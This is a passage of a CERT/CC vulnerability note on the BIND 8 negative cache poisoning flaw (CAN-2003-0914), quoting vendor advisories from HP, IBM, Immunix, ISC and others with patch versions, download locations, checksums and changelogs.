\nsrc/sys/conf/newvers.sh 1.44.2.17.2.46 \nsrc/contrib/bind/Version 1.1.1.3.2.4.2.2 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.2.2.4.2.3` \n`- ------------------------------------------------------------------------- \n` \n`VII. References \n` \n`<URL:``<http://www.kb.cert.org/vuls/id/734644>``> \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.3 (FreeBSD) \n` \n`iD8DBQE/x8/PFdaIBMps37IRAsl8AJ9zgqn4QmO08d9zj9de8/uGKIQBNgCfeHKC \ntM9nSOzoCrM+O+TpNn6ewt4= \n=PJi2 \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Guardian Digital Inc.\n\nNotified: October 21, 2003 Updated: December 02, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`+------------------------------------------------------------------------+ \n| Guardian Digital Security Advisory November 26, 2003 | \n| ``<http://www.guardiandigital.com>`` ESA-20031126-031 | \n| | \n| Packages: bind-chroot, bind-chroot-utils | \n| Summary: cache poisoning vulnerability. | \n+------------------------------------------------------------------------+ \n` \n`EnGarde Secure Linux is an enterprise class Linux platform engineered \nto enable corporations to quickly and cost-effectively build a complete \nand secure Internet presence while preventing Internet threats.` \n \n`OVERVIEW \n- --------` \n`A cache poisoning vulnerability exists in the version of BIND shipped \nwith all versions of EnGarde Secure Linux. Successful exploitation of \nthis vulnerability may result in a temporary denial of service until \nthe bad record expires from the cache.` \n \n`The Common Vulnerabilities and Exposures project (cve.mitre.org) has \nassigned the name CAN-2003-0914 to this issue.` \n \n`Guardian Digital products affected by this issue include: \n` \n`EnGarde Secure Community v1.0.1 \nEnGarde Secure Community 2 \nEnGarde Secure Professional v1.1 \nEnGarde Secure Professional v1.2 \nEnGarde Secure Professional v1.5` \n \n`It is recommended that all users apply this update as soon as possible. \n` \n`SOLUTION \n- --------` \n`Guardian Digital Secure Network subscribers may automatically update \naffected systems by accessing their account from within the Guardian \nDigital WebTool.` \n \n`To modify your GDSN account and contact preferences, please go to: \n` \n`<https://www.guardiandigital.com/account/>`` \n` \n`Below are MD5 sums for the updated EnGarde Secure Linux 1.0.1 packages: \n` \n`SRPMS/bind-chroot-8.2.6-1.0.30.src.rpm \nMD5 Sum: 6127e55aaeffe9c92dcf793df910ee75` \n \n`i386/bind-chroot-8.2.6-1.0.30.i386.rpm \nMD5 Sum: b631c88d82dc4883df2271204d50abc3` \n \n`i386/bind-chroot-utils-8.2.6-1.0.30.i386.rpm \nMD5 Sum: eaac0812f751998c7f5ad66f7ba9d9d4` \n \n`i686/bind-chroot-8.2.6-1.0.30.i686.rpm \nMD5 Sum: 4b5ced2b8f72d9df3a340833ef0a60c0` \n \n`i686/bind-chroot-utils-8.2.6-1.0.30.i686.rpm \nMD5 Sum: 21f203bb6fad4a5474b179337c395442` \n \n`REFERENCES \n- ----------` \n`Guardian Digital's public key: \n``<http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY>` \n \n`BIND's Official Web Site: \n``<http://www.isc.org/products/BIND/>` \n \n`Guardian Digital Advisories: \n``<http://infocenter.guardiandigital.com/advisories/>` \n \n`Security Contact: security@guardiandigital.com \n` \n`- -------------------------------------------------------------------------- \nAuthor: Ryan W. Maple <ryan@guardiandigital.com> \nCopyright 2003, Guardian Digital, Inc. \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.2 (GNU/Linux) \n` \n`iD8DBQE/xTVoHD5cqd57fu0RAvc0AJ9kvIUaS+VjjFaI1Stwj/I1u4IX1ACfSe9P \nNkyQtP2aIVcE0Ztt4ZV0uuU= \n=2G9V \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Hewlett-Packard Company\n\nNotified: October 21, 2003 Updated: December 03, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`Document ID: HPSBUX0311-303 \nDate Loaded: 20031130`\n\n`Title: SSRT3653 Bind 8.1.2 \n` \n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n` \n`----------------------------------------------------------------- \nSource: HEWLETT-PACKARD COMPANY \nSECURITY BULLETIN: HPSBUX0311-303 \nOriginally issued: 30 November 2003 \nSSRT3653 Bind 8.1.2 \n-----------------------------------------------------------------` \n \n`NOTICE: There are no restrictions for distribution of this \nBulletin provided that it remains complete and intact. \n` \n`The information in the following Security Bulletin should be \nacted upon as soon as possible. Hewlett-Packard Company will \nnot be liable for any consequences to any customer resulting \nfrom customer's failure to fully implement instructions in this \nSecurity Bulletin as soon as possible. \n` \n`----------------------------------------------------------------- \n` \n`PROBLEM: Potential security vulnerability in Bind 8.1.2. \n` \n`PLATFORM: HP-UX B.11.00 and B.11.11. \n` \n`IMPACT: Potential remotely exploitable denial of service. \n` \n`SOLUTION: Until a product upgrade is available, download and \ninstall appropriate preliminary updates or upgrade \nto Bind 9.2.0.` \n \n`B.11.11 - Install the preliminary depot: \nSSRT3653UX.depot.` \n`B.11.00 - A Bind 8.1.2 upgrade is available from \nthe ftp site listed below.` \n \n`The issue can be avoided by upgrading to \nBind 9.2.0 which is available now. The security \nbulletin HPSBUX0208-209 has details about required \nrevisions of Bind 9.2.0 for B.11.00 and B.11.11.` \n \n`MANUAL ACTIONS: Yes - NonUpdate \nB.11.11 - Install SSRT3653UX.depot.` \n`or upgrade to Bind 9.2.0. \nB.11.00 - Upgrade to Bind 9.2.0 or` \n`install BIND812v005.depot. \n` \n`AVAILABILITY: This bulletin will be revised when a patch \nis available for B.11.11.` \n \n`----------------------------------------------------------------- \nA. Background` \n`The potential for a remotely exploitable denial of service \nexists in Bind 8.1.2.` \n \n`AFFECTED VERSIONS \n` \n`The following is a list by HP-UX revision of \naffected filesets and the fileset revision or \npatch containing the fix. To determine if a \nsystem has an affected version, search the \noutput of \"swlist -a revision -l fileset\" \nfor an affected fileset, then determine if \na fixed revision or the applicable patch is \ninstalled.` \n \n`HP-UX B.11.11 \n============= \nInternetSrvcs.INETSVCS-RUN \nfix: install SSRT3653UX.depot or` \n`upgrade to Bind 9.2.0. \n` \n`HP-UX B.11.00 \n============= \nBINDv812.INETSVCS-BIND \nfix: upgrade to BIND-812 revision B.11.00.01.005 or` \n`upgrade to Bind 9.2.0. \n` \n`END AFFECTED VERSIONS \n` \n`B. Recommended solution \n` \n`Note: \nThe issue can be avoided by upgrading to \nBind 9.2.0 which is available now. The security \nbulletin HPSBUX0208-209 has details about required \nrevisions of Bind 9.2.0 for B.11.00 and B.11.11.` \n \n`HP-UX B.11.00 Bind 8.1.2 \n======================== \nBIND812 for B.11.00 has been discontinued. It will \nbecome obsolete by the end of March, 2004. A new \nversion of BIND812 for B.11.00 has been created to \naddress the issue of this bulletin. However, it is \nrecommended that customers upgrade to Bind 9.2.0 now. \nMore details can be found here:` \n \n`<<http://software.hp.com/portal/swdepot/> \ndisplayProductInfo.do?productNumber=BIND812>` \n \n`The new version of BIND812 for B.11.00 is available from \nthe ftp site listed below. Since BIND812 for B.11.00 has \nbeen discontinued, this version will not be available \nfrom software.hp.com.` \n \n`HP-UX B.11.11 Bind 8.1.2 \n========================` \n \n`Until a patch is available a temporary depot has been created \nto install a version of /usr/sbin/named which addresses the \nissue. The depot is available from the ftp site listed \nbelow. The depot will not install the new named file unless \nPHNE_28450 has been installed first. PHNE_28450 is available \nfrom <<http://itrc.hp.com>>.` \n \n`========================================================= \n` \n`For B.11.00 download BIND812v005.depot from the \nfollowing ftp site.` \n \n`For B.11.11 download SSRT3653UX.depot from the \nfollowing ftp site.` \n \n`System: hprc.external.hp.com (192.170.19.51) \nLogin: bind812 \nPassword: bind812` \n \n`FTP Access: <ftp://bind:bind1@hprc.external.hp.com/> \nor: <ftp://bind:bind1@192.170.19.51/>` \n`For B.11.11 - file: SSRT3653UX.depot \nFor B.11.00 - file: BIND812v005.depot` \n \n`Note: There is an ftp defect in IE5 that may result in \na browser hang. To work around this:` \n`- Select Tools -> Internet Options -> Advanced \n- Un-check the option:` \n`[ ] Enable folder view for FTP sites \n` \n`If you wish to verify the md5 sum please refer to: \n` \n`HPSBUX9408-016 \nPatch sums and the MD5 program` \n \n`For B11.00 - BIND812v005.depot \ncksum: 1413515727 1239040 BIND812v005.depot \nMD5 (BIND812v005.depot) = 333920fa1b74820bee15f2287bacc3c2` \n \n`For B.11.11 - SSRT3653UX.depot \ncksum: 509054485 389120 SSRT3653UX.depot \nMD5 (SSRT3653UX.depot) = ee96c169ec3712d5907b7fe983d108dc` \n \n`For B.11.00 - Install BIND812v005.depot using swinstall. \n` \n`For B.11.11 - Install SSRT3653UX.depot using swinstall \nafter PHNE_28450 has been installed.` \n \n`Further information is available in the readme file: \ncd <directory containing SSRT3653UX.depot> \nswlist -d -l product -a readme @ $PWD/SSRT3653UX.depot` \n \n \n`- ------------------------------------------------------------------ \n` \n`C. To subscribe to automatically receive future NEW HP Security \nBulletins from the HP IT Resource Center via electronic \nmail, do the following:` \n \n`Use your browser to get to the HP IT Resource Center page \nat:` \n \n`<http://itrc.hp.com> \n` \n`Use the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login, in order to \ngain access to many areas of the ITRC. Remember to save the \nUser ID assigned to you, and your password.` \n \n`In the left most frame select \"Maintenance and Support\". \n` \n`Under the \"Notifications\" section (near the bottom of \nthe page), select \"Support Information Digests\".` \n \n`To -subscribe- to future HP Security Bulletins or other \nTechnical Digests, click the check box (in the left column) \nfor the appropriate digest and then click the \"Update \nSubscriptions\" button at the bottom of the page.` \n \n`or \n` \n`To -review- bulletins already released, select the link \n(in the middle column) for the appropriate digest.` \n \n`To -gain access- to the Security Patch Matrix, select \nthe link for \"The Security Bulletins Archive\". (near the \nbottom of the page) Once in the archive the third link is \nto the current Security Patch Matrix. Updated daily, this \nmatrix categorizes security patches by platform/OS release, \nand by bulletin topic. Security Patch Check completely \nautomates the process of reviewing the patch matrix for \n11.XX systems.` \n \n`For information on the Security Patch Check tool, see: \n<http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/> \ndisplayProductInfo.pl?productNumber=B6834AA` \n \n`The security patch matrix is also available via anonymous \nftp:` \n \n`<ftp://ftp.itrc.hp.com/export/patches/hp-ux_patch_matrix/> \n` \n`On the \"Support Information Digest Main\" page: \nclick on the \"HP Security Bulletin Archive\".` \n \n`D. To report new security vulnerabilities, send email to \n` \n`security-alert@hp.com \n` \n`Please encrypt any exploit information using the \nsecurity-alert PGP key, available from your local key \nserver, or by sending a message with a -subject- (not body) \nof 'get key' (no quotes) to security-alert@hp.com.` \n \n`---------------------------------------------------------------- \n` \n`(c) Copyright 2003 Hewlett-Packard Company \nHewlett-Packard Company shall not be liable for technical or \neditorial errors or omissions contained herein. The information \nin this document is subject to change without notice. \nHewlett-Packard Company and the names of HP products referenced \nherein are trademarks and/or service marks of Hewlett-Packard \nCompany. Other product and company names mentioned herein may be \ntrademarks and/or service marks of their respective owners. \n` \n`________________________________________________________________ \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: PGP 8.0.2 \n` \n`iQA/AwUBP8oPruAfOvwtKn1ZEQJTlwCg2y1qe8rZiKbUPHuCPkFbIIhVaPkAnja2 \n/Nbi2zNFnmk0FQ0mtBxKx48U \n=L5yo \n-----END PGP SIGNATURE----- \n-----End of Document ID: HPSBUX0311-303--------------------------------------`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ IBM\n\nNotified: October 21, 2003 Updated: December 03, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to the BIND8 cache poisoning attack in releases 4.3.3, 5.1.0 and 5.2.0 . The APAR's for this fix and their availablity are listed below. \n\n\nAPAR number for AIX 4.3.3: IY49899 (available 2/25/2004) \nAPAR number for AIX 5.1.0: IY49881 (available) \nAPAR number for AIX 5.2.0: IY49883 (available 12/24/2003) \n \nThese APARs can be downloaded by following the link for IBM's Fix Central at: \n\n\n<http://www-1.ibm.com/servers/eserver/support/eseries/fixes> \nEfix packages for 4.3.3 and 5.2.0 will be available by 12/02/2004 at: \n\n\n<ftp://aix.software.ibm.com/aix/efixes/security/dns_poison_efix.tar.Z>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nIBM has published APAR IY49881 regarding this vulnerability. For more information, please see:\n\n### __ Immunix\n\nUpdated: December 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`[Outlook and Notes users -- please ask your system administrators to \nassist you in creating out-of-office-autoreplies that respect public \nmail lists; perhaps, creating such a reply that works only within the \norganization or business partners.] \n`\n\n`[Virus scanner administrators -- sending virus warnings to a From: or \nFrom_ header is a waste of time. Please configure your scanners to drop \nmail in the SMTP protocol, and not bounce the email after the fact. \nThanks.] \n` \n`----------------------------------------------------------------------- \nImmunix Secured OS Security Advisory` \n \n`Packages updated:bind \nAffected products:Immunix OS 7+ \nBugs fixed:VU#734644 CAN-2003-0914 \nDate:Mon Oct 27 2003 \nAdvisory ID:IMNX-2003-7+-024-01 \nAuthor:Seth Arnold <sarnold@immunix.com> \n----------------------------------------------------------------------- \n` \n`Description: \nA vulnerability has been found in BIND that \".. allows an attacker to \nconduct cache poisoning attacks on vulnerable name servers by \nconvincing the servers to retain invalid negative responses.\"` \n \n`Our bind-8.2.3-3.3_imnx_5 packages fix this problem using a patch \nderived from the BIND 8.3.7 release. This vulnerability has been named \nCAN-2003-0914 by the CVE project.` \n \n`We'd like to apologize to our US subscribers for the incredibly poor \ntiming, to release this notice a day before the Thanksgiving holiday. \nOur options were limited by ISC, the package maintainer.` \n \n`References: ``<http://www.kb.cert.org/vuls/id/734644>`` \n``<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0914>` \n \n`Package names and locations: \nPrecompiled binary packages for Immunix 7+ are available at: \n``<http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/bind-8.2.3-3.3_imnx_5.i386.rpm>`` \n``<http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/bind-devel-8.2.3-3.3_imnx_5.i386.rpm>`` \n``<http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/bind-utils-8.2.3-3.3_imnx_5.i386.rpm>` \n \n`A source package for Immunix 7+ is available at: \n``<http://download.immunix.org/ImmunixOS/7+/Updates/SRPMS/bind-8.2.3-3.3_imnx_5.src.rpm>` \n \n`Immunix OS 7+ md5sums: \n8a5874f96e1c76b11c214ab16e1183f4 RPMS/bind-8.2.3-3.3_imnx_5.i386.rpm \n83535ea7a69ab222ccf5c8664bfd66b9 RPMS/bind-devel-8.2.3-3.3_imnx_5.i386.rpm \n7669fedc653731bf54cc0dd48b258a8f RPMS/bind-utils-8.2.3-3.3_imnx_5.i386.rpm \n445c908f0c4daffe0a153bc7e5514a85 SRPMS/bind-8.2.3-3.3_imnx_5.src.rpm` \n \n \n`GPG verification: \nOur public keys are available at ``<http://download.immunix.org/GPG_KEY>`` \nImmunix, Inc., has changed policy with GPG keys. We maintain several \nkeys now: C53B2B53 for Immunix 7+ package signing, D3BA6C17 for \nImmunix 7.3 package signing, and 1B7456DA for general security issues.` \n \n \n`NOTE: \nIbiblio is graciously mirroring our updates, so if the links above are \nslow, please try:` \n`<ftp://ftp.ibiblio.org/pub/Linux/distributions/immunix/>`` \nor one of the many mirrors available at:` \n`<http://www.ibiblio.org/pub/Linux/MIRRORS.html>`` \n` \n`ImmunixOS 6.2 is no longer officially supported. \nImmunixOS 7.0 is no longer officially supported.` \n \n`Contact information: \nTo report vulnerabilities, please contact security@immunix.com. \nImmunix attempts to conform to the RFP vulnerability disclosure protocol` \n`<http://www.wiretrip.net/rfp/policy.html>``.`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Internet Software Consortium\n\nNotified: September 04, 2003 Updated: December 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n` Internet Software Consortium Security Advisory. \nNegative Cache Poison Attack`\n\n` 4 September 2003 \n` \n` Versions affected: \nBIND 8 prior to 8.3.7 \nBIND 8.4.3 Release (8.4.3-REL) \n` \n`BIND 8.4.3 is a maintenance release of BIND 8.4. It includes the BIND 8.4.2 \nrelease which includes a security fix (also released as BIND 8.3.7). \n` \n`Highlights. \nMaintenance Release.` \n \n`Highlights (8.4.2) \nSecurity Fix: Negative Cache Poison Fix.` \n \n`the distribution files are: \n` \n`<ftp://ftp.isc.org/isc/bind/src/8.4.3/bind-src.tar.gz> \n<Ftp://ftp.isc.org/isc/bind/src/8.4.3/bind-doc.tar.gz> \n<ftp://ftp.isc.org/isc/bind/src/8.4.3/bind-contrib.tar.gz> \n` \n`the pgp signature files are: \n` \n`<ftp://ftp.isc.org/isc/bind/src/8.4.3/bind-src.tar.gz.asc> \n<ftp://ftp.isc.org/isc/bind/src/8.4.3/bind-doc.tar.gz.asc> \n<ftp://ftp.isc.org/isc/bind/src/8.4.3/bind-contrib.tar.gz.asc> \n` \n`the md5 checksums are: \n` \n \n`MD5 (bind-contrib.tar.gz) = 454f8e3caf1610941a656fcc17e1ecec \nMD5 (bind-contrib.tar.gz.asc) = f8f0a5b8985a8180e5bd02207f319980 \nMD5 (bind-doc.tar.gz) = fcfdaaa2fc7d6485b0e3d08299948bd3 \nMD5 (bind-doc.tar.gz.asc) = fc0671468c2e3a1e5ff817b69da21a6b \nMD5 (bind-src.tar.gz) = e78610fc1663cfe8c2db6a2d132d902b \nMD5 (bind-src.tar.gz.asc) = 40453b40819fd940ad4bfabd26425619 \n` \n`Windows NT / Windows 2000 binary distribution. \n` \n`<ftp://ftp.isc.org/isc/bind/contrib/ntbind-8.4.3/readme1st.txt> \n<ftp://ftp.isc.org/isc/bind/contrib/ntbind-8.4.3/BIND8.4.3.zip> \n<ftp://ftp.isc.org/isc/bind/contrib/ntbind-8.4.3/BIND8.4.3.zip.asc> \n` \n`<ftp://ftp.isc.org/isc/bind/contrib/ntbind-8.4.3/readme1sttools.txt> \n<ftp://ftp.isc.org/isc/bind/contrib/ntbind-8.4.3/BIND8.4.3Tools.zip> \n<ftp://ftp.isc.org/isc/bind/contrib/ntbind-8.4.3/BIND8.4.3Tools.zip.asc> \n` \n`the md5 checksums are: \n` \n`MD5 (readme1st.txt) = ac4ce260f151dc1ab393c145f4288bba \nMD5 (BIND8.4.3.zip) = 7c3e333f90edbe3820952a62ff6ffdf3 \nMD5 (BIND8.4.3.zip.asc) = f2190cc390ce584c0cc624835bdcc8eb \n` \n`MD5 (readme1sttools.txt) = eef4c5782be1a1faac3ca0c756eaef05 \nMD5 (BIND8.4.3Tools.zip) = 8cb29c092394dfa430ef9ea47b6a02ea \nMD5 (BIND8.4.3Tools.zip.asc) = a77b2adb1f23db780f45efee32a92882 \n` \n`top of CHANGES says: \n` \n`--- 8.4.3 released --- (Mon Nov 24 17:27:52 PST 2003) \n` \n`1617.[cleanup]don't pre-fetch missing additional address records if \nwe have one of A/AAAA.` \n \n`1616.[func]turn on \"preferred-glue A;\" (if not specified in \nnamed.conf) if the answer space is a standard UDP \nmessage size or smaller.` \n \n`1615.[func]when query logging log whether TSIG (T) and/or EDNS (E) \nwas used to make the query.` \n \n`1614.[cleanup]on dual (IPv4+IPv6) stack servers delay the lookup of \nmissing glue if we have glue for one family.` \n \n`1613.[cleanup]notify: don't lookup A/AAAA records for nameservers \nif we don't support the address at the transport level.` \n \n`1612.[func]named now takes arguements -4 and -6 to limit the \nIP transport used for making queries.` \n \n`1611.[debug]better packet tracing in debug output (+ some lint). \n` \n`1610.[bug]don't explictly declare errno use <errno.h>. \n` \n`1609.[bug]drop_port() was being called with ports in network \norder rather than host order.` \n \n`1608.[port]sun: force alignment of answer in dig.c. \n` \n`1607.[bug]do not attempt to prime cache when recursion and \nfetch-glue are disabled.` \n \n`1606.[bug]sysquery duplicate detection was broken when \nusing forwarders.` \n \n`1605.[port]sun: force alignment of newmsg in ns_resp.c. \n` \n`1604.[bug]heap_delete() sometimes violated the heap invariant, \ncausing timer events not to be posted when due.` \n \n`1603.[port]ds_remove_gen() mishandled removal IPv6 interfaces. \n` \n`1602.[port]linux: work around a non-standard __P macro. \n` \n`1601.[bug]dig could report the wrong server address on transfers. \n` \n`1600.[bug]debug_freestr() prototype mismatch. \n` \n`1599.[bug]res_nsearch() save statp->res_h_errno instead of \nh_errno.` \n \n`1598.[bug]dprint_ip_match_list() fails to print the mask \ncorrectly.` \n \n`1597.[bug]use the actual presentation length of the IP address \nto determine if sprintf() is safe in write_tsig_info().` \n \n`--- 8.4.2 released --- (Thu Sep 4 06:58:22 PDT 2003) \n` \n`1596.[port]winnt: set USELOOPBACK in port_after.h \n` \n`1595.[bug]dig: strcat used instead of strcpy. \n` \n`1594.[bug]if only a single nameserver was listed in resolv.conf \nIPv6 default server was also being used.` \n \n`1593.[port]irix: update port/irix/irix_patch. \n` \n`1592.[port]irix: provide a sysctl() based getifaddrs() \nimplementation.` \n \n`1591.[port]irix: sa_len is a macro. \n` \n`1590.[port]irix: doesn't have msg_control (NO_MSG_CONTROL) \n` \n`1589.[port]linux: uninitalised variable. \n` \n`1588.[port]solaris: provide ALIGN. \n` \n`1587.[port]NGR_R_END_RESULT was not correct for some ports. \n` \n`1586.[port]winnt: revert to old socket behaviour for UDP \nsockets (Windows 2000 SP2 and later).` \n \n`1585.[port]solaris: named-xfer needs <fcntl.h>. \n` \n`1584.[port]bsdos: explictly include <netinet6/in6.h> for \n4.0 and 4.1.` \n \n`1583.[bug]add -X to named-xfer usage message. \n` \n`1582.[bug]ns_ownercontext() failed to set the correct owner \ncontext for AAAA records. ns_ptrcontext() failed \nto return the correct context for IP6.ARPA.` \n \n`1581.[bug]apply anti-cache poison techniques to negative \nanswers.` \n \n`1580.[bug]inet_net_pton() didn't fully handle implicit \nmulticast IPv4 network addresses.` \n \n`1579.[bug]ifa_addr can be NULL. \n` \n`1578.[bug]named-xfer: wrong arguement passed to getnameinfo(). \n` \n`1577. [func] return referrals for glue (NS/A/AAAA) if recursion \nis not desired (hp->rd = 0).` \n \n`1576.[bug]res_nsendsigned() incorrectly printed the truncated \nUDP response when RES_IGNTC was not set.` \n \n`1575.[bug]tcp_send() passed the wrong length to evConnect(). \n` \n`1574.[bug]res_nsendsigned() failed to handle truncation \ncleanly.` \n \n`1573.[bug]tsig_size was not being copied by ns_forw(). \n` \n`1572.[port]bsdos: missing #include <ifaddrs.h>. \n` \n`1571.[bug]AA was sometimes incorrectly set. \n` \n`1570.[port]decunix: change #1544 broke OSF1 3.2C. \n` \n`1569.[bug]remove extraneous closes. \n` \n`1568.[cleanup]reduce the memory footprint for large numbers of \nzones.` \n \n`1567.[port]winnt: install MSVC70.DLL and MFC70.DLL. \n` \n`1566.[bug]named failed to locate keys declared in masters \nclause.` \n \n`1565.[bug]named-xfer was failing to use TSIG. \n` \n`1564.[port]linux: allow static linkage to work. \n` \n`1563.[bug]ndc getargs_closure failed to NUL terminate strings. \n` \n`1562.[bug]handle non-responsive servers better. \n` \n`1561.[bug]rtt estimates were not being updated for IPv6 \naddresses.` \n \n`1560.[port]linux: add runtime support to handle old kernels \nthat don't know about msg_control.` \n \n`1559.[port]named, named-xfer: ensure that stdin, stdout and \nstderr are open.` \n \n`--- 8.4.1-P1 released --- (Sun Jun 15 17:35:10 PDT 2003) \n` \n`1558.[port]sunos4 doesn't have msg_control (NO_MSG_CONTROL). \n` \n`1557.[port]linux: socket returns EINVAL for unsupported family. \n` \n`1556.[bug]reference through NULL pointer. \n` \n`1555.[bug]sortlist wasn't being applied to AAAA queries. \n` \n`1554.[bug]IPv4 access list elements of the form number/number \n(e.g. 127/8) were not correctly defined.` \n \n`1553.[bug]getifaddrs*() failed to set ifa_dstaddr for point \nto point links (overwrote ifa_addr).` \n \n`1552.[bug]buffer overruns in getifaddrs*() if the server has \npoint to point links.` \n \n`1551.[port]freebsd: USE_IFNAMELINKIDS should be conditionally \ndefined.` \n \n`1550.[port]TruCluster support didn't build. \n` \n`1549.[port]Solaris 9 has /dev/random. \n` \n`--- 8.4.1-REL released --- (Sun Jun 8 15:11:32 PDT 2003) \n` \n`1548.[port]winnt: make recv visible from libbind. \n` \n`1547.[port]cope with spurious EINVAL from evRead. \n` \n`1546.[cleanup]dig now reports version 8.4. \n` \n`1545.[bug]getifaddrs_sun6 was broken. \n` \n`1544.[port]hpux 10.20 has a broken recvfrom(). Revert to recv() \nin named-xfer and work around deprecated recv() in \nOSF.` \n \n`1543.[bug]named failed to send notifies to servers that live \nin zones it was authoritative for.` \n \n`1542.[bug]set IPV6_USE_MIN_MTU on IPv6 sockets if the kernel \nsupports it.` \n \n`1541.[bug]getifaddrs_sun6() should be a no-op on early SunOS \nreleases.` \n \n`--- 8.4.0-REL released --- (Sun Jun 1 17:49:31 PDT 2003) \nBIND 8.3.7 Release` \n \n`BIND 8.3.7 is a security release of BIND 8.3. This is expected to \nbe the last release of BIND 8.3 except for security issues. \n` \n`The recommended version to use is BIND 9.2.3. If for whatever \nreason you must run BIND 8, use nothing earlier than 8.3.7-REL, \n8.4.2-REL. Do not under any circumstances run BIND 4. \n` \n`Highlights vs. 8.3.6 \nSecurity Fix: Negative Cache Poison Fix.` \n \n`Highlights vs. 8.3.5 \nMaintenance release.` \n \n`Highlights vs. 8.3.4 \nMaintenance release.` \n \n`Highlights vs. 8.3.3 \nSecurity Fix DoS and buffer overrun.` \n \n`Highlights vs. 8.3.2 \nSecurity Fix libbind. All applications linked against libbind \nneed to re-linked. \n'rndc restart' now preserves named's arguments` \n \n`Highlights vs. BIND 8.3.1: \ndig, nslookup, host and nsupdate have improved IPv6 support.` \n \n`Highlights vs. BIND 8.3.0: \n` \n`Critical bug fix to prevent DNS storms. If you have BIND 8.3.0 you \nneed to upgrade.` \n \n`the distribution files are: \n` \n`<ftp://ftp.isc.org/isc/bind/src/8.3.7/bind-src.tar.gz> \n<ftp://ftp.isc.org/isc/bind/src/8.3.7/bind-doc.tar.gz> \n<ftp://ftp.isc.org/isc/bind/src/8.3.7/bind-contrib.tar.gz> \n` \n`the pgp signature files are: \n` \n`<ftp://ftp.isc.org/isc/bind/src/8.3.7/bind-src.tar.gz.asc> \n<ftp://ftp.isc.org/isc/bind/src/8.3.7/bind-doc.tar.gz.asc> \n<ftp://ftp.isc.org/isc/bind/src/8.3.7/bind-contrib.tar.gz.asc> \n` \n`the md5 checksums are: \n` \n`MD5 (bind-contrib.tar.gz) = 89009ee8d937cd652a77742644772023 \nMD5 (bind-contrib.tar.gz.asc) = 3b91ed818771d21aa37c3ecc4685ba9d \nMD5 (bind-doc.tar.gz) = b7ccbde30d8c43202eabf61a51366852 \nMD5 (bind-doc.tar.gz.asc) = 333f80ec3d12ef7fc27a19ba2f9a9be0 \nMD5 (bind-src.tar.gz) = 36cc1660eb7d73e872a1e5af6f832167 \nMD5 (bind-src.tar.gz.asc) = 50a45b11e12441142d6eac423c5d01c7 \n` \n`Windows NT / Windows 2000 binary distribution. \n` \n`There will be no Windows binary release of BIND 8.3.7. \nThe current Windows binary release is BIND 8.4.3.` \n \n`top of CHANGES says: \n` \n`--- 8.3.7-REL released --- (Wed Sep 3 21:01:37 PDT 2003) \n` \n`1581.[bug]apply anti-cache poison techniques to negative \nanswers.` \n \n`--- 8.3.6-REL released --- (Sun Jun 8 15:11:32 PDT 2003) \n`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ NetBSD\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNetBSD (1.6, 1.6.1 and current) is shipping with vulnerable version of BIND 8. We will upgrade to either 8.3.7 or 8.4.2 as soon as ISC releases the info to the public. Or, users might want to use BIND 9 from pkgsrc.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Nixu\n\nNotified: October 21, 2003 Updated: November 20, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe current versions of Nixu NameSurfer are not affected by this issue as they ship with BIND 9.2.2. However, as NameSurfer Suite and NameSurfer Standard Edition also support all the earlier versions of BIND, Nixu recommends that all organizations operating an existing Nixu NameSurfer installation upgrade their visible nameservers to BIND versions 9.2.1 or newer; BIND9 is compatible with NameSurfer versions 3.0.1 or newer.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you 